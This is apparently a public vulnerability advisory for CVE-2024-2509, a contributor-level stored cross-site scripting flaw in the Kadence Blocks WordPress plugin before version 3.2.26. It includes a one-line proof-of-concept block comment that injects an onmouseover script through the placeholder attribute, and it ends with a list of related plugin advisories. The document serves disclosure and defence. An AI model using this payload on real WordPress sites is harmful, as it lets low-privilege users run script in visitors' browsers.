Gutenberg Blocks by Kadence Blocks < 3.2.26 – Contributor+ Stored XSS | CVE 2024-2509 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor (or above), edit a post in Code Editor mode, put the below code in it and save:

<!-- wp:kadence/advanced-form-text {"uniqueID":"9c5eb1-eb","formID":"1","label":"Name","placeholder":"Mouse Over There!\u0022onmouseover='alert(/XSS/)'"} /-->

The XSS will be trigged when viewing/previewing the post and moving the mouse over the generated input.

Affects Plugins

Fixed in 3.2.26

References

CVE

URL

https://research.cleantalk.org/cve-2024-2509/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

dec4a632-e04b-4fdd-86e4-48304b892a4f

Timeline

Publicly Published

2024-03-15 (about 1 year ago)

Added

2024-03-15 (about 1 year ago)

Last Updated

2024-03-18 (about 1 year ago)

Other

Published

Title

Published

2024-05-21

Title

NextScripts: Social Networks Auto-Poster < 4.4.4 - Unauthenticated Stored Cross-Site Scripting via User Agent

Published

2024-03-28

Title

Themify Event Post < 1.2.8 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2017-08-07

Title

Pressforward < 5.2.4 - Reflected Cross-Site Scripting (XSS)

Published

2019-10-15

Title

Broken Link Checker <= 1.11.8 - Authenticated Cross-Site Scripting (XSS)

Published

2023-08-18

Title

WooCommerce PDF Invoice Builder < 1.2.91 - Admin+ Stored XSS